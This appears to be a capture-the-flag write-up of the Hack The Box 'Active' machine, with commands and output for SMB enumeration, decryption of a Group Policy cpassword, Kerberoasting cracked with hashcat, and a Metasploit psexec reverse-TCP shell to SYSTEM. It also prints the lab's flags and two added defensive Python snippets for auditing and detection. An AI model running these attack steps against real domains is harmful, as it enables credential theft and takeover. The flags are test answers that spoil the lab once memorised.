Active
Port Scan Results ⤵️
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-07 14:43 IST
Nmap scan report for 10.10.10.100
Host is up (0.17s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-07 09:21:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
SMB Enumeration ⤵️
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient -L //10.10.10.100/
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Let's browse the file system of the SMB shares →
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient -N \\\\10.10.10.100\\Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
active.htb D 0 Sat Jul 21 16:07:44 2018
5217023 blocks of size 4096. 278613 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Groups.xml A 533 Thu Jul 19 02:16:06 2018
5217023 blocks of size 4096. 278613 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> more Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Now I have a set of credentials →
userName = "active.htb\SVC_TGS"
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
In the SMB share above we saw the contents of the Replication folder, which in this instance holds the same Group Policy data that SYSVOL does. It contains a Groups.xml file with a cpassword value, a Group Policy Preferences password encrypted with the AES key that Microsoft published in its own documentation (the weakness addressed by MS14-025), so anyone who can read the share can recover the plaintext. Let's decrypt it with gpp-decrypt, a tool preinstalled in Kali.
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
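The defender's counterpart to what gpp-decrypt just did is to find every such file before an attacker does. The following audit script is an added example, not part of the original writeup: it walks a SYSVOL- or Replication-style directory tree, parses each Group Policy Preferences XML file type that can carry a cpassword, and reports the affected account, action and change date. The sample Groups.xml it scans is constructed in the layout seen on the share, with a placeholder cpassword.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference XML files that can carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# The attribute naming the affected account differs per file type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def findings_in_file(path):
    """Return one dict per element whose <Properties> carries a non-empty cpassword."""
    found = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return found  # malformed file: nothing to report, but keep scanning
    for elem in root.iter():
        props = elem.find("Properties")
        if props is None or not props.get("cpassword"):
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)),
                       elem.get("name", "?"))
        found.append({"file": os.path.basename(path), "account": account,
                      "action": props.get("action", "?"),
                      "changed": elem.get("changed", "?")})
    return found

def scan_sysvol(root_dir):
    """Walk a SYSVOL (or Replication) tree and collect every cpassword finding."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                findings.extend(findings_in_file(os.path.join(dirpath, name)))
    return findings

# Constructed sample in the layout of the Groups.xml found on the share; the
# cpassword value is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06"><Properties action="U" cpassword="PLACEHOLDER_CPASSWORD" userName="active.htb\\SVC_TGS"/></User>
</Groups>
"""

def demo():
    """Write the sample into a temporary SYSVOL-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpo = os.path.join(tmp, "Policies", "{GUID}", "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(tmp)
```

Any finding means the password must be rotated and the preference item removed from the GPO, since deleting the file alone does not undo the exposure.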
The decrypted password is: GPPstillStandingStrong2k18
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ smbclient \\\\10.10.10.100\\Users -U 'SVC_TGS'
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls -al
NT_STATUS_NO_SUCH_FILE listing \-al
smb: \> ls
. DR 0 Sat Jul 21 20:09:20 2018
.. DR 0 Sat Jul 21 20:09:20 2018
Administrator D 0 Mon Jul 16 15:44:21 2018
All Users DHSrn 0 Tue Jul 14 10:36:44 2009
Default DHR 0 Tue Jul 14 12:08:21 2009
Default User DHSrn 0 Tue Jul 14 10:36:44 2009
desktop.ini AHS 174 Tue Jul 14 10:27:55 2009
Public DR 0 Tue Jul 14 10:27:55 2009
SVC_TGS D 0 Sat Jul 21 20:46:32 2018
5217023 blocks of size 4096. 278803 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 20:46:32 2018
.. D 0 Sat Jul 21 20:46:32 2018
Contacts D 0 Sat Jul 21 20:44:11 2018
Desktop D 0 Sat Jul 21 20:44:42 2018
Downloads D 0 Sat Jul 21 20:44:23 2018
Favorites D 0 Sat Jul 21 20:44:44 2018
Links D 0 Sat Jul 21 20:44:57 2018
My Documents D 0 Sat Jul 21 20:45:03 2018
My Music D 0 Sat Jul 21 20:45:32 2018
My Pictures D 0 Sat Jul 21 20:45:43 2018
My Videos D 0 Sat Jul 21 20:45:53 2018
Saved Games D 0 Sat Jul 21 20:46:12 2018
Searches D 0 Sat Jul 21 20:46:24 2018
5217023 blocks of size 4096. 278803 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 20:44:42 2018
.. D 0 Sat Jul 21 20:44:42 2018
user.txt AR 34 Wed Aug 9 09:44:14 2023
5217023 blocks of size 4096. 278803 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
I now have the user.txt file →
c83e7e6adf44f7e0fef6f206da497b07
Now, for administrative access, I need to enumerate Kerberos service tickets. Impacket's GetUserSPNs.py script lists domain accounts that have a Service Principal Name set and, with -request, asks the KDC for a service ticket for each of them, which is what the next step cracks offline (Kerberoasting).
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ locate GetUserSPNs.py
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ cp /usr/share/doc/python3-impacket/examples/GetUserSPNs.py .
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -k -request -dc-ip 10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2023-08-09 09:44:25.256547
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ee302fdc44d924c812d4dbf4951e55ea$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
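On the domain controller, every ticket request above is recorded as Security event 4769, and the "$23$" in the ticket is etype 23 (0x17, RC4-HMAC), which that event stores in its Ticket Encryption Type field. The detection logic below is an added example, not part of the original writeup; it runs over constructed 4769 records (SVC_TGS is the account from this box, the other principals are made up) and flags requesters that obtained RC4 tickets for user-held SPNs.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: the "$23$" in the ticket that hashcat mode 13100 cracks

# Constructed 4769 records (not real logs). user = TargetUserName (requester),
# service = ServiceName (SPN owner), etype = TicketEncryptionType, status = Status.
SAMPLE_4769 = [
    {"ts": "2023-08-09T09:44:20", "user": "DC$@ACTIVE.HTB", "service": "krbtgt",
     "etype": "0x12", "status": "0x0"},
    {"ts": "2023-08-09T09:44:25", "user": "SVC_TGS@ACTIVE.HTB", "service": "Administrator",
     "etype": "0x17", "status": "0x0"},
    {"ts": "2023-08-09T09:44:26", "user": "SVC_TGS@ACTIVE.HTB", "service": "DC$",
     "etype": "0x12", "status": "0x0"},
    {"ts": "2023-08-09T09:44:27", "user": "SVC_TGS@ACTIVE.HTB", "service": "sqlsvc",
     "etype": "0x17", "status": "0x0"},
    {"ts": "2023-08-09T10:30:00", "user": "alice@ACTIVE.HTB", "service": "Administrator",
     "etype": "0x17", "status": "0x0"},
    {"ts": "2023-08-09T10:31:00", "user": "bob@ACTIVE.HTB", "service": "sqlsvc",
     "etype": "0x17", "status": "0x6"},
]

def is_roastable_request(ev):
    """Successfully issued RC4 service ticket for a user-held (not machine, not krbtgt) SPN."""
    svc = ev["service"]
    return (int(ev["etype"], 16) == RC4_HMAC
            and ev["status"] == "0x0"
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))

def kerberoast_candidates(events, window=timedelta(minutes=10)):
    """Map each requester to the largest set of distinct user SPNs it obtained RC4
    tickets for inside any `window`; many services within seconds is the roast signal."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), ev["service"]))
    result = {}
    for user, reqs in by_user.items():
        reqs.sort()
        best = set()
        for i, (t0, _) in enumerate(reqs):
            seen = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(seen) > len(best):
                best = seen
        result[user] = sorted(best)
    return result
```

A single RC4 request can be a legacy client, so the per-requester service count is the triage key; moving service accounts to AES-only keys removes the RC4 tickets this rule keys on.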
Now let's crack this ticket with hashcat to recover the password I want →
┌──(kali㉿kali)-[~/Downloads/HTB/Active]
└─$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
...
...
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$acb5a62add6835d58aa8fd01c863930c$c2e917f5e50ca6fbae799bcf10ebbe580415dbd539d68d80ce3448b26311a4b3c4dd28fa006edfb9de58c05382f42646fdc4bc1c9a19bbc3b963145b8fe67054f67538e33d2f2e531ac642e1867be1d3e292657382bcd2addac9d9f29e7ddc8c515ddba055a06c4a6102032dddd446a4a5d23b07fcbbf7510b4caf13b032bfcfe6dbafb75bcdc908e6deffb6f78dadb49d087b7f8914f37f1433dc272065eab015d81d6220a883ad25179e2c07d0be3bacf832df1884b3ed046b279549c6af5798ed6abeb08b94dffaa8127c81fd2417633edf853edc541b58e9a1792b904cae05f3af11c9b73ebb018741edd5d20c88553cb7ca614995cfed81048e05f90f5666d428aef7692c02b091a519d4cabc499ecd6b025c9f5740f0d240e5959b58bf0da5e02d10d5ba508c19f493fa69d5b59a76b535b9d8da0ded57a1393bda790f2877a4517ceca6212371d2bb25fe48eda582c39d0dedf706ccd15fbdd76ceca8a0068f9d0ae567d845538170e1135270949672f52b3ca2f63951bb077d8c95f787320fe00cd4c912feef706f57bd73ec12497dc4a97fb3997cef20eb841333b3567322247dd7c0b8d31b1aa1f1726274b56b994a416d74bd1555ead7567c0b5e2e9127072ed8f0ca3bbbfb7ff8aa20c7a5e42da855c9b4a64fba54994fe6ad1183b7588a60d6113ce65b1f5a9072732239091ef2be3183c89ea8458a5aa3775605f1994e723e4b19a2b753b8bba8031209757bf39b11d7cd054b62c20e59e39eb863a91b37dadf1b38f66360da2230bcbc0bc37b8c1e4530e023d95eb771f96135b000b7da40182dc2a54b733e52f678476a8436a3b8489dc45407a731fd909be001119ea22c5293c19815756e425256fc8c012db0df4034486925e9ed927473eaed76bcedd7f1c576cb51eeebc7488908e7b11aae3603b2aa25c245e2b59381d531fef7db22c6daf3bba078cc7dc6f6dcd62079e619e79d66ef9997f21be30b0f4ceeabb42ad18182a8fb115a6d07885b164194921ee46e09a5e91c8f7ab07747902b62afc2ef868469d754a581ab9cc33b09ba6c7d3d7ac433c63e31c325caba3a915577ae64a7006e1c6de1e6697d516a4ba6e0a5c253e245077842401be5ca1823dae75c931c0f1a9948cb2ce9da623ab25fad00f10cc684c1a32dfa53069c6bea1452136f373398470220337f3ac25356f9851219938e42ea96ab4d4f8fc5e522fbd3a28f3735c2193297b1864973a468d728a8ae15e000:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...15e000
Time.Started.....: Wed Aug 9 13:31:15 2023 (18 secs)
Time.Estimated...: Wed Aug 9 13:31:33 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 561.8 kH/s (1.46ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10537984/14344385 (73.46%)
Rejected.........: 0/10537984 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> ThruJasonK21
Hardware.Mon.#1..: Util: 77%
Started: Wed Aug 9 13:30:50 2023
Stopped: Wed Aug 9 13:31:34 2023
Now I have the password: Ticketmaster1968. Let's get a shell with these credentials through Metasploit, using the module named smb/psexec →
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain active.htb no The Windows domain to use for authentication
SMBPass Ticketmaster1968 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.94 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) >
Now it's time to run the exploit ⤵️
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.94:4444
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445|active.htb as user 'Administrator'...
[*] 10.10.10.100:445 - Selecting PowerShell target
[*] 10.10.10.100:445 - Executing the payload...
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.94:4444 -> 10.10.10.100:49896) at 2023-08-09 13:36:47 +0530
meterpreter > sysinfo
Computer : DC
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : el_GR
Domain : ACTIVE
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../../
meterpreter > dir
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2009-07-14 08:04:39 +0530 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 08:50:08 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2022-01-12 18:41:58 +0530 Program Files
040555/r-xr-xr-x 4096 dir 2021-01-21 22:19:16 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2022-01-12 18:39:27 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2018-07-16 15:43:22 +0530 Recovery
040777/rwxrwxrwx 4096 dir 2018-07-19 00:15:01 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-07-21 20:09:20 +0530 Users
040777/rwxrwxrwx 16384 dir 2023-08-09 10:31:43 +0530 Windows
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cd Users
meterpreter > dir
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2018-07-16 15:44:21 +0530 Administrator
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 12:08:21 +0530 Default
040777/rwxrwxrwx 0 dir 2009-07-14 10:36:44 +0530 Default User
040555/r-xr-xr-x 4096 dir 2009-07-14 10:27:55 +0530 Public
040777/rwxrwxrwx 4096 dir 2018-07-21 20:46:32 +0530 SVC_TGS
100666/rw-rw-rw- 174 fil 2009-07-14 10:27:55 +0530 desktop.ini
meterpreter > cd Administrator\\
meterpreter > ls
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 AppData
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Application Data
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Contacts
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Cookies
040555/r-xr-xr-x 0 dir 2021-01-21 22:19:47 +0530 Desktop
040555/r-xr-xr-x 4096 dir 2018-07-30 19:20:10 +0530 Documents
040555/r-xr-xr-x 0 dir 2021-01-21 22:22:32 +0530 Downloads
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Favorites
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Links
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Local Settings
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Music
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 My Documents
100666/rw-rw-rw- 524288 fil 2023-08-09 09:44:25 +0530 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2018-07-16 15:44:15 +0530 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 NetHood
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Pictures
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 PrintHood
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Recent
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Saved Games
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Searches
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 SendTo
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Start Menu
040777/rwxrwxrwx 0 dir 2018-07-16 15:44:15 +0530 Templates
040555/r-xr-xr-x 0 dir 2018-07-30 19:20:10 +0530 Videos
100666/rw-rw-rw- 262144 fil 2023-08-09 10:31:43 +0530 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 2018-07-16 15:44:09 +0530 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2018-07-16 15:44:15 +0530 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2018-07-30 19:20:10 +0530 desktop.ini
100444/r--r--r-- 34 fil 2023-08-09 09:44:14 +0530 root.txt
meterpreter > cat root.txt
c8a0d7e6349f05d8b41db241dfeb84ff
meterpreter >
meterpreter > shell
Process 2848 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
If you have any questions or suggestions, please leave a comment below. Thank You !